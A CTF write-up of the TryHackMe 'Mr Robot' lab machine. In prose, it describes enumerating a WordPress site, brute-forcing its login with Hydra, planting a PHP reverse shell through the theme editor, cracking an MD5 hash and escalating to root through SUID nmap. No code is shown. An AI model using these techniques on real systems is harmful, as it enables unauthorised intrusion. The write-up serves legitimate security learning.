TryHackMe: Mr Robot CTF — Writeup

Harshit Maheshwari
May 18 · 6 min read

The writeup for a room in TryHackMe named Mr. Robot.


About TryHackMe

TryHackMe is an amazing platform to learn cyber security and it’s an amazing asset if you are new to it and don’t know where to start. They have these rooms that are basically vulnerable machines that you can deploy and practice your skills. The best part about TryHackMe is that it’s pretty hands on. If you are new to security, make sure you give it a try.


So after deploying the machine on TryHackMe portal, we get an IP to access this machine. It is going to different for every time you deploy it, so your ROOM-IP might be different from mine.

nmap scan:

We need to know what services are running behind the scenes and what ports are open. So we are going to use a tool called nmap.

Having ports 80 and 443 indicates we have a website running, so we open http://10.10.71.122 and https://10.10.71.122 on our browser.

The website is Mr. Robot themed website. Running the commands mentioned in the picture just redirects to other pages which have images and videos from Mr. Robot TV show.

Since we have a website, we would like to enumerate the directories of the website to see things like login page, admin portal, and etc exist or not.

gobuster scan:

So we will be using a tool called gobuster, which uses an existing wordlist of possible common directories name and will try to load every directory name in that wordlist and would then look at status code. (If you are using Kali or ParrotOS, then you can find these wordlists at /usr/share/wordlists/dirbuster)

The output is saved in the file directories.txt

Now let’s take a look directories with status code 200

/readme
/license
/readme
/rdf (Interesting..?)
/wp-login (Looks like an admin login page)
/robots

Jackpot. Opening 10.10.71.122/key-1–of-3.txt

Here’s our key 1/3.

Key 1 : Captured!

Now’s let’s take a look at fsociety.dic

It looks like a dictionary.

Let’s use this dictionary to perform dictionary attack on the login page we saw earlier.

We get the error: Invalid username.

Let’s try admin:admin to login:

Using BurpSuite to intercept the login request packet.

The username and password fields by log and pwd respectively.

Perfoming dictionary attack using Hydra

The dictionary would be fsocity.dic . In this case we have received a file from them, for other cases we would try to use comman usernames and then password. You can find these and all the other lists at https://github.com/danielmiessler/SecLists.

So, first we will try to find the username with password as constant, then we will use the found username to get the password.

Username changes, password constant

We get username as Elliot.

Let’s try to login with Elliot:test

We get error: The password you entered for the username Elliot is incorrect.

Username constant, password changes

We get a 9 digit password : *********

Using Elliot:********* to login:

The site is running WordPress 4.3.1.

Now we need to open a reverse shell, so let’s try to open a php-reverse-shell . Kali and ParrotOS already have it. All you have to do is locate it.

If you do not have Kali or ParrotOS, you can simply google it and find it easily.

Opening a reverse-shell

In wp-admin, go to left navigation bar and select Appearance → Editor and then select Archives (archive.php) on the right

Once, Archives are open. Paste the php-reverse-shell.php in the Edit section

Now we will have to edit the value of variable IP . We will have to set it to our IP, so that when the reverse shell is opened, it knows which IP to connect to.

running ifconfig command
Snippet of how your edited php-reverse-shell.php file should look like

You can change the port if you want, just remember the port you change it to.

Click Update and let’s open netcat to listen to the port 1234 .

Now let’s open archive.php. Check what theme it’s running and open the theme as shown below.

Opening http://10.10.162.7/wp-content/themes/twentyfifteen/archive.php
We opened a reverse shell…yay!
We cannot read key-2-of-3.txt

We need to user robot to read key-2-of-3.txt but we can still read password.raw-md5. So let’s do that.

Let’s use John-The-Ripper, to crack this MD5 hash

Switching to user robot

To switch users, we need a terminal and we cannot open terminal using /bin/sh -i
So we open terminal using this method
Opening key-2-of-3.txt

Key 2 : Captured!

Now to capture the 3rd flag, we need to get to root, so we will perform privilege escalation, so we need to figure out which programs have SUID of at least 4000

We find nmap here

Privilege escalation using nmap

Nmap has SUID bit set. A lot of times administrators set the SUID bit to nmap so that it can be used to scan the network efficiently as all the nmap scanning techniques does not work if you don’t run it with root privilege.

However, there is a functionality in nmap older versions where you can run nmap in an interactive mode which allows you to escape to shell. If nmap has SUID bit set, it will run with root privilege and we can get access to ‘root’ shell through it’s interactive mode.

Key 3 : Captured!


I’ve had an amazing time in this room and learned a lot. TryHackMe has tons of other rooms, each different from another which gives a huge learning opportunity as well. Would try to upload writeups of rooms that I found interesting. For know, I hope you also learned something from this writeup. Cheers! 🍺

Now, let me shamelessly ask you to

Follow me on Github, Twitter, and connect on LinkedIn.

References:

  1. Opening php-reverse-shell for wordpress (https://pentaroot.com/exploit-wordpress-backdoor-theme-pages/)
  2. Opening terminal using Python(https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
  3. Privilege escalation using nmap(https://payatu.com/guide-linux-privilege-escalation)

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Harshit Maheshwari

Written by

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Harshit Maheshwari

Written by

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store